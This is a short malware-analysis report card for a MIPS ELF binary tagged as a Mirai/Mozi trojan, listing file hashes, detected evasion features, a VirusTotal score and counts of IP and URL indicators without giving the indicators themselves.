i

First submission: 2024-08-26 07:22:11
Last submission: 2024-09-05 12:46:05

File details

File type: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, no section header
Mime type: application/x-executable
File size: 284.48 KB (291312 bytes)
MD5: 8fabd065e7343d393a21f7bafba3cece
SHA1: a50698641c39cbfc0fd79acab70168f9ff3e9906
SHA256: b64a2606b85c9d3127d5b5f4592137eefd1604f8aa4fa5c662ba7131f59ce5d0

File features detected

Is DLL
Packers
Anti Debug
Anti VM
Signed
XOR

OSINT Enrichments

Virus Total: 42/79
VT report date: 2024-08-18 18:51:16
Malware Type (1): trojan
Threat Type (3): mirai mozi cryp

URLs, FQDN and IP indicators 11


Strings analysis - File found

XML
M7c.xml

Strings analysis - Possible IPs found 10


Strings analysis - Possible URLs found 24
